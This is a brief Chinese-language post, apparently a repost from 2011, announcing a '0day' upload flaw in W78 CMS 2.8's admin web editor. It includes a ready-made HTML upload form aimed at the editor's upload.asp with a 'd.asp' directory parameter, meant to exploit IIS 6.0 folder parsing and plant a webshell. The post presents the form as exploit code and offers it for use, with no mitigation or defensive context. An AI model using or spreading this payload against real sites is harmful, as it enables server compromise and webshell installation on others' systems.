W78 CMS企业网站管理系统 2.8 0day最新漏洞

2011-8-9 10:06:55 来源:网络转载 浏览:237
W78 CMS企业网站管理系统 2.8 0day最新漏洞

主要是后台编辑器上传漏洞。配合IIS6.0可以直接上传拿shell


<form action="http://127.0.0.1/admin/w78eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=d.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
 
以是上利用代码

(0)
(0)